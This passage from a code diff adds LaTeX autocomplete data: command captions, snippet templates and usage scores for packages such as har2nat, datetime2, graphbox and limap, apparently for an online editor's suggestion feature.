0.00042021825647418025, + }, + { + caption: '\\aftergroup', + snippet: '\\aftergroup', + meta: 'har2nat-cmd', + score: 0.002020423627422133, + }, + { + caption: '\\setcitestyle{}', + snippet: '\\setcitestyle{$1}', + meta: 'har2nat-cmd', + score: 0.0015840652870152204, + }, + { + caption: '\\citeyearpar{}', + snippet: '\\citeyearpar{$1}', + meta: 'har2nat-cmd', + score: 0.001877888310324327, + }, + { + caption: '\\MakeUppercase{}', + snippet: '\\MakeUppercase{$1}', + meta: 'har2nat-cmd', + score: 0.006776001543888959, + }, + { + caption: '\\MakeUppercase', + snippet: '\\MakeUppercase', + meta: 'har2nat-cmd', + score: 0.006776001543888959, + }, + { + caption: '\\newblock', + snippet: '\\newblock', + meta: 'har2nat-cmd', + score: 0.03684301726876973, + }, + { + caption: '\\newblock{}', + snippet: '\\newblock{$1}', + meta: 'har2nat-cmd', + score: 0.03684301726876973, + }, + { + caption: '\\bibnumfmt', + snippet: '\\bibnumfmt', + meta: 'har2nat-cmd', + score: 0.000353353600267394, + }, + { + caption: 
'\\citeyear{}', + snippet: '\\citeyear{$1}', + meta: 'har2nat-cmd', + score: 0.01091041305836494, + }, + { + caption: '\\citeauthor{}', + snippet: '\\citeauthor{$1}', + meta: 'har2nat-cmd', + score: 0.01359248786373484, + }, + { + caption: '\\let', + snippet: '\\let', + meta: 'har2nat-cmd', + score: 0.03789745970461662, + }, + ], + 'matlab-prettifier': [ + { + caption: '\\mlttfamily', + snippet: '\\mlttfamily', + meta: 'matlab-prettifier-cmd', + score: 0.000856282742498241, + }, + { + caption: '\\vskip', + snippet: '\\vskip', + meta: 'matlab-prettifier-cmd', + score: 0.05143052892347224, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'matlab-prettifier-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'matlab-prettifier-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'matlab-prettifier-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\thelstlisting', + snippet: '\\thelstlisting', + meta: 'matlab-prettifier-cmd', + score: 0.00012774128088872144, + }, + { + caption: '\\lstinputlisting[]{}', + snippet: '\\lstinputlisting[$1]{$2}', + meta: 'matlab-prettifier-cmd', + score: 0.011660477607086044, + }, + { + caption: '\\lstinputlisting{}', + snippet: '\\lstinputlisting{$1}', + meta: 'matlab-prettifier-cmd', + score: 0.011660477607086044, + }, + { + caption: '\\space', + snippet: '\\space', + meta: 'matlab-prettifier-cmd', + score: 0.023010789853665694, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'matlab-prettifier-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\lstinline', + snippet: '\\lstinline', + meta: 'matlab-prettifier-cmd', + score: 0.005972262850694285, + }, + { + caption: '\\lstinline{}', + snippet: '\\lstinline{$1}', + meta: 'matlab-prettifier-cmd', + score: 0.005972262850694285, + }, + { + caption: '\\lstlistoflistings', + snippet: '\\lstlistoflistings', + meta: 'matlab-prettifier-cmd', + score: 0.005279080363360602, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'matlab-prettifier-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'matlab-prettifier-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'matlab-prettifier-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'matlab-prettifier-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'matlab-prettifier-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'matlab-prettifier-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'matlab-prettifier-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'matlab-prettifier-cmd', + score: 0.000264339771769041, + }, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'matlab-prettifier-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'matlab-prettifier-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'matlab-prettifier-cmd', + score: 0.0008147200475678891, + }, + { + caption: 
'\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'matlab-prettifier-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'matlab-prettifier-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'matlab-prettifier-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'matlab-prettifier-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'matlab-prettifier-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'matlab-prettifier-cmd', + score: 0.2864294797053033, + }, + ], + datetime2: [ + { + caption: '\\robustify{}', + snippet: '\\robustify{$1}', + meta: 'datetime2-cmd', + score: 0.002671974990314091, + }, + { + caption: '\\setbool{}{}', + snippet: '\\setbool{$1}{$2}', + meta: 'datetime2-cmd', + score: 0.00023171033119130004, + }, + { + caption: '\\ifdefempty{}{}{}', + snippet: '\\ifdefempty{$1}{$2}{$3}', + meta: 'datetime2-cmd', + score: 7.482069221111606e-5, + }, + { + caption: '\\apptocmd{}{}{}{}', + snippet: '\\apptocmd{$1}{$2}{$3}{$4}', + meta: 'datetime2-cmd', + score: 0.00035805058319299113, + }, + { + caption: '\\ifstrequal{}{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}{$4}', + meta: 'datetime2-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\ifstrequal{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}', + meta: 'datetime2-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'datetime2-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\csedef{}{}', + snippet: '\\csedef{$1}{$2}', + meta: 'datetime2-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'datetime2-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\newrobustcmd{}[]{}', + snippet: '\\newrobustcmd{$1}[$2]{$3}', + meta: 'datetime2-cmd', + score: 0.0006607703576475988, + }, + { + caption: '\\ifdefstring{}{}{}{}', + snippet: '\\ifdefstring{$1}{$2}{$3}{$4}', + meta: 'datetime2-cmd', + score: 0.0006796212875843042, + }, + { + caption: '\\ifbool{}{}{}', + snippet: '\\ifbool{$1}{$2}{$3}', + meta: 'datetime2-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\patchcmd{}{}{}{}{}', + snippet: '\\patchcmd{$1}{$2}{$3}{$4}{$5}', + meta: 'datetime2-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\patchcmd', + snippet: '\\patchcmd', + meta: 'datetime2-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\preto{}{}', + snippet: '\\preto{$1}{$2}', + meta: 'datetime2-cmd', + score: 8.860754525300578e-5, + }, + { + caption: '\\ifnumcomp{}{}{}{}{}', + snippet: '\\ifnumcomp{$1}{$2}{$3}{$4}{$5}', + meta: 'datetime2-cmd', + score: 0.00029867998381154486, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'datetime2-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\newbool{}', + snippet: '\\newbool{$1}', + meta: 'datetime2-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\AtBeginEnvironment{}{}', + snippet: '\\AtBeginEnvironment{$1}{$2}', + meta: 'datetime2-cmd', + score: 4.002553629215439e-5, + }, + { + caption: '\\pretocmd{}{}{}{}', + snippet: '\\pretocmd{$1}{$2}{$3}{$4}', + meta: 'datetime2-cmd', + score: 0.00028992557275763024, + }, + { + caption: '\\ifundef{}{}{}', + snippet: '\\ifundef{$1}{$2}{$3}', + meta: 'datetime2-cmd', + score: 0.00014933999190577243, + }, + { + 
caption: '\\csname', + snippet: '\\csname', + meta: 'datetime2-cmd', + score: 0.008565354665444157, + }, + ], + lapdf: [ + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'lapdf-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\setlength{}{}', + snippet: '\\setlength{$1}{$2}', + meta: 'lapdf-cmd', + score: 0.354445763583904, + }, + { + caption: '\\setlength', + snippet: '\\setlength', + meta: 'lapdf-cmd', + score: 0.354445763583904, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'lapdf-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'lapdf-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'lapdf-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\setcounter{}{}', + snippet: '\\setcounter{$1}{$2}', + meta: 'lapdf-cmd', + score: 0.10068045662118841, + }, + { + caption: '\\addtolength{}{}', + snippet: '\\addtolength{$1}{$2}', + meta: 'lapdf-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\addtolength', + snippet: '\\addtolength', + meta: 'lapdf-cmd', + score: 0.028955796305270766, + }, + ], + nccbbb: [ + { + caption: '\\bbbe', + snippet: '\\bbbe', + meta: 'nccbbb-cmd', + score: 0.0013332214754983353, + }, + { + caption: '\\bbbe[]', + snippet: '\\bbbe[$1]', + meta: 'nccbbb-cmd', + score: 0.0013332214754983353, + }, + { + caption: '\\bbbr', + snippet: '\\bbbr', + meta: 'nccbbb-cmd', + score: 0.0015739010274051707, + }, + ], + tgbonum: [ + { + caption: '\\empty', + snippet: '\\empty', + meta: 'tgbonum-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'tgbonum-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tgbonum-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'tgbonum-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'tgbonum-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tgbonum-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tgbonum-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'tgbonum-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'tgbonum-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'tgbonum-cmd', + score: 0.021170869458413965, + }, + ], + 'thm-restate': [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'thm-restate-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\listtheoremname', + snippet: '\\listtheoremname', + meta: 'thm-restate-cmd', + score: 1.9443373798666845e-5, + }, + { + caption: '\\thmtformatoptarg', + snippet: '\\thmtformatoptarg', + meta: 'thm-restate-cmd', + score: 6.353668036093916e-5, + }, + { + caption: '\\listoftheorems[]', + snippet: '\\listoftheorems[$1]', + meta: 'thm-restate-cmd', + score: 1.9443373798666845e-5, + }, + { + caption: '\\declaretheoremstyle[]{}', + snippet: '\\declaretheoremstyle[$1]{$2}', + meta: 'thm-restate-cmd', + score: 0.0001168034231635369, + }, + { + caption: '\\declaretheorem[]{}', + snippet: '\\declaretheorem[$1]{$2}', + meta: 'thm-restate-cmd', + score: 0.0004904790216915127, + }, + { + caption: 
'\\theoremstyle{}', + snippet: '\\theoremstyle{$1}', + meta: 'thm-restate-cmd', + score: 0.02533412165007986, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'thm-restate-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'thm-restate-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'thm-restate-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\proof{}', + snippet: '\\proof{$1}', + meta: 'thm-restate-cmd', + score: 0.000701497773639073, + }, + { + caption: '\\proof', + snippet: '\\proof', + meta: 'thm-restate-cmd', + score: 0.000701497773639073, + }, + { + caption: '\\newtheorem{}[]{}', + snippet: '\\newtheorem{$1}[$2]{$3}', + meta: 'thm-restate-cmd', + score: 0.215689795055434, + }, + { + caption: '\\newtheorem{}{}', + snippet: '\\newtheorem{$1}{$2}', + meta: 'thm-restate-cmd', + score: 0.215689795055434, + }, + { + caption: '\\newtheorem{}{}[]', + snippet: '\\newtheorem{$1}{$2}[$3]', + meta: 'thm-restate-cmd', + score: 0.215689795055434, + }, + { + caption: '\\endproof', + snippet: '\\endproof', + meta: 'thm-restate-cmd', + score: 0.0006133100544751855, + }, + { + caption: '\\endproof{}', + snippet: '\\endproof{$1}', + meta: 'thm-restate-cmd', + score: 0.0006133100544751855, + }, + ], + 'biblatex-chicago': [ + { + caption: '\\robustify{}', + snippet: '\\robustify{$1}', + meta: 'biblatex-chicago-cmd', + score: 0.002671974990314091, + }, + { + caption: '\\setbool{}{}', + snippet: '\\setbool{$1}{$2}', + meta: 'biblatex-chicago-cmd', + score: 0.00023171033119130004, + }, + { + caption: '\\ifdefempty{}{}{}', + snippet: '\\ifdefempty{$1}{$2}{$3}', + meta: 'biblatex-chicago-cmd', + score: 7.482069221111606e-5, + }, + { + caption: '\\apptocmd{}{}{}{}', + snippet: '\\apptocmd{$1}{$2}{$3}{$4}', + meta: 'biblatex-chicago-cmd', + score: 0.00035805058319299113, + }, + { + caption: '\\ifstrequal{}{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}{$4}', + meta: 'biblatex-chicago-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\ifstrequal{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}', + meta: 'biblatex-chicago-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'biblatex-chicago-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\csedef{}{}', + snippet: '\\csedef{$1}{$2}', + meta: 'biblatex-chicago-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'biblatex-chicago-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\newrobustcmd{}[]{}', + snippet: '\\newrobustcmd{$1}[$2]{$3}', + meta: 'biblatex-chicago-cmd', + score: 0.0006607703576475988, + }, + { + caption: '\\ifdefstring{}{}{}{}', + snippet: '\\ifdefstring{$1}{$2}{$3}{$4}', + meta: 'biblatex-chicago-cmd', + score: 0.0006796212875843042, + }, + { + caption: '\\ifbool{}{}{}', + snippet: '\\ifbool{$1}{$2}{$3}', + meta: 'biblatex-chicago-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\patchcmd{}{}{}{}{}', + snippet: '\\patchcmd{$1}{$2}{$3}{$4}{$5}', + meta: 'biblatex-chicago-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\patchcmd', + snippet: '\\patchcmd', + meta: 'biblatex-chicago-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\preto{}{}', + snippet: '\\preto{$1}{$2}', + meta: 'biblatex-chicago-cmd', + score: 8.860754525300578e-5, + }, + { + caption: '\\ifnumcomp{}{}{}{}{}', + snippet: '\\ifnumcomp{$1}{$2}{$3}{$4}{$5}', + meta: 'biblatex-chicago-cmd', + score: 
0.00029867998381154486, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'biblatex-chicago-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\newbool{}', + snippet: '\\newbool{$1}', + meta: 'biblatex-chicago-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\AtBeginEnvironment{}{}', + snippet: '\\AtBeginEnvironment{$1}{$2}', + meta: 'biblatex-chicago-cmd', + score: 4.002553629215439e-5, + }, + { + caption: '\\pretocmd{}{}{}{}', + snippet: '\\pretocmd{$1}{$2}{$3}{$4}', + meta: 'biblatex-chicago-cmd', + score: 0.00028992557275763024, + }, + { + caption: '\\ifundef{}{}{}', + snippet: '\\ifundef{$1}{$2}{$3}', + meta: 'biblatex-chicago-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'biblatex-chicago-cmd', + score: 0.008565354665444157, + }, + ], + pseudocode: [ + { + caption: '\\shadowbox{}', + snippet: '\\shadowbox{$1}', + meta: 'pseudocode-cmd', + score: 0.00107667147399019, + }, + { + caption: '\\doublebox', + snippet: '\\doublebox', + meta: 'pseudocode-cmd', + score: 0.00015142240898356106, + }, + { + caption: '\\VerbatimEnvironment', + snippet: '\\VerbatimEnvironment', + meta: 'pseudocode-cmd', + score: 4.5350034239275855e-5, + }, + { + caption: '\\thisfancypage{}{}', + snippet: '\\thisfancypage{$1}{$2}', + meta: 'pseudocode-cmd', + score: 0.00015142240898356106, + }, + { + caption: '\\TheSbox', + snippet: '\\TheSbox', + meta: 'pseudocode-cmd', + score: 4.5350034239275855e-5, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'pseudocode-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'pseudocode-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'pseudocode-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'pseudocode-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'pseudocode-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'pseudocode-cmd', + score: 0.0018957469739775527, + }, + ], + imakeidx: [ + { + caption: '\\makeindex', + snippet: '\\makeindex', + meta: 'imakeidx-cmd', + score: 0.010304996748556729, + }, + { + caption: '\\printindex', + snippet: '\\printindex', + meta: 'imakeidx-cmd', + score: 0.004417016910870522, + }, + { + caption: '\\index{}', + snippet: '\\index{$1}', + meta: 'imakeidx-cmd', + score: 0.013774721817648336, + }, + { + caption: '\\RequireXeTeX', + snippet: '\\RequireXeTeX', + meta: 'imakeidx-cmd', + score: 0.00021116765384691477, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'imakeidx-cmd', + score: 0.008565354665444157, + }, + ], + uri: [ + { + caption: '\\empty', + snippet: '\\empty', + meta: 'uri-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'uri-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'uri-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\UrlBreaks{}', + snippet: '\\UrlBreaks{$1}', + meta: 'uri-cmd', + score: 0.001030592515645366, + }, + { + caption: '\\UrlBreaks', + snippet: '\\UrlBreaks', + meta: 'uri-cmd', + score: 0.001030592515645366, + }, + { + caption: '\\Url', + snippet: '\\Url', + meta: 'uri-cmd', + score: 0.0002854206807593436, + }, + { + caption: '\\UrlOrds{}', + snippet: 
'\\UrlOrds{$1}', + meta: 'uri-cmd', + score: 0.0006882563723629154, + }, + { + caption: '\\UrlOrds', + snippet: '\\UrlOrds', + meta: 'uri-cmd', + score: 0.0006882563723629154, + }, + { + caption: '\\urlstyle{}', + snippet: '\\urlstyle{$1}', + meta: 'uri-cmd', + score: 0.010515056688180681, + }, + { + caption: '\\urldef{}', + snippet: '\\urldef{$1}', + meta: 'uri-cmd', + score: 0.008041789461944983, + }, + { + caption: '\\UrlBigBreaks{}', + snippet: '\\UrlBigBreaks{$1}', + meta: 'uri-cmd', + score: 3.7048287721105874e-5, + }, + { + caption: '\\UrlFont{}', + snippet: '\\UrlFont{$1}', + meta: 'uri-cmd', + score: 0.0032990580087398644, + }, + { + caption: '\\UrlSpecials{}', + snippet: '\\UrlSpecials{$1}', + meta: 'uri-cmd', + score: 3.7048287721105874e-5, + }, + { + caption: '\\UrlNoBreaks', + snippet: '\\UrlNoBreaks', + meta: 'uri-cmd', + score: 3.7048287721105874e-5, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'uri-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'uri-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'uri-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'uri-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'uri-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'uri-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'uri-cmd', + score: 0.021170869458413965, + }, + ], + tocvsec2: [ + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'tocvsec2-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'tocvsec2-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'tocvsec2-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'tocvsec2-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'tocvsec2-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'tocvsec2-cmd', + score: 0.0018957469739775527, + }, + ], + graphbox: [ + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'graphbox-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'graphbox-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'graphbox-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'graphbox-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'graphbox-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'graphbox-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'graphbox-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'graphbox-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'graphbox-cmd', + 
score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'graphbox-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'graphbox-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'graphbox-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'graphbox-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'graphbox-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'graphbox-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'graphbox-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'graphbox-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'graphbox-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'graphbox-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'graphbox-cmd', + score: 0.008565354665444157, + }, + ], + limap: [ + { + caption: '\\MapContinuing{}', + snippet: '\\MapContinuing{$1}', + meta: 'limap-cmd', + score: 7.216282820556303e-5, + }, + { + caption: '\\MapTextFraction{}', + snippet: '\\MapTextFraction{$1}', + meta: 'limap-cmd', + score: 7.216282820556303e-5, + }, + { + caption: '\\MapBlockLabelFont{}', + snippet: '\\MapBlockLabelFont{$1}', + meta: 'limap-cmd', + score: 7.216282820556303e-5, + }, + { + caption: '\\Block{}', + snippet: '\\Block{$1}', + meta: 'limap-cmd', + score: 0.011618215341095648, + }, + { + caption: '\\MapRuleWidth{}', + snippet: '\\MapRuleWidth{$1}', + meta: 'limap-cmd', + score: 7.216282820556303e-5, + }, + { + caption: '\\MapTitleFraction{}', + snippet: '\\MapTitleFraction{$1}', + meta: 'limap-cmd', + score: 7.216282820556303e-5, + }, + { + caption: '\\MapContinued{}', + snippet: '\\MapContinued{$1}', + meta: 'limap-cmd', + score: 7.216282820556303e-5, + }, + { + caption: '\\WideBlock{}', + snippet: '\\WideBlock{$1}', + meta: 'limap-cmd', + score: 0.002453536158989143, + }, + { + caption: '\\MapParskip{}', + snippet: '\\MapParskip{$1}', + meta: 'limap-cmd', + score: 7.216282820556303e-5, + }, + { + caption: '\\robustify{}', + snippet: '\\robustify{$1}', + meta: 'limap-cmd', + score: 0.002671974990314091, + }, + { + caption: '\\setbool{}{}', + snippet: '\\setbool{$1}{$2}', + meta: 'limap-cmd', + score: 0.00023171033119130004, + }, + { + caption: '\\ifdefempty{}{}{}', + snippet: '\\ifdefempty{$1}{$2}{$3}', + meta: 'limap-cmd', + score: 7.482069221111606e-5, + }, + { + caption: '\\apptocmd{}{}{}{}', + snippet: '\\apptocmd{$1}{$2}{$3}{$4}', + meta: 'limap-cmd', + score: 0.00035805058319299113, + }, + { + caption: '\\ifstrequal{}{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}{$4}', + meta: 'limap-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\ifstrequal{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}', + meta: 'limap-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'limap-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\csedef{}{}', + snippet: '\\csedef{$1}{$2}', + meta: 
'limap-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'limap-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\newrobustcmd{}[]{}', + snippet: '\\newrobustcmd{$1}[$2]{$3}', + meta: 'limap-cmd', + score: 0.0006607703576475988, + }, + { + caption: '\\ifdefstring{}{}{}{}', + snippet: '\\ifdefstring{$1}{$2}{$3}{$4}', + meta: 'limap-cmd', + score: 0.0006796212875843042, + }, + { + caption: '\\ifbool{}{}{}', + snippet: '\\ifbool{$1}{$2}{$3}', + meta: 'limap-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\patchcmd{}{}{}{}{}', + snippet: '\\patchcmd{$1}{$2}{$3}{$4}{$5}', + meta: 'limap-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\patchcmd', + snippet: '\\patchcmd', + meta: 'limap-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\preto{}{}', + snippet: '\\preto{$1}{$2}', + meta: 'limap-cmd', + score: 8.860754525300578e-5, + }, + { + caption: '\\ifnumcomp{}{}{}{}{}', + snippet: '\\ifnumcomp{$1}{$2}{$3}{$4}{$5}', + meta: 'limap-cmd', + score: 0.00029867998381154486, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'limap-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\newbool{}', + snippet: '\\newbool{$1}', + meta: 'limap-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\AtBeginEnvironment{}{}', + snippet: '\\AtBeginEnvironment{$1}{$2}', + meta: 'limap-cmd', + score: 4.002553629215439e-5, + }, + { + caption: '\\pretocmd{}{}{}{}', + snippet: '\\pretocmd{$1}{$2}{$3}{$4}', + meta: 'limap-cmd', + score: 0.00028992557275763024, + }, + { + caption: '\\ifundef{}{}{}', + snippet: '\\ifundef{$1}{$2}{$3}', + meta: 'limap-cmd', + score: 0.00014933999190577243, 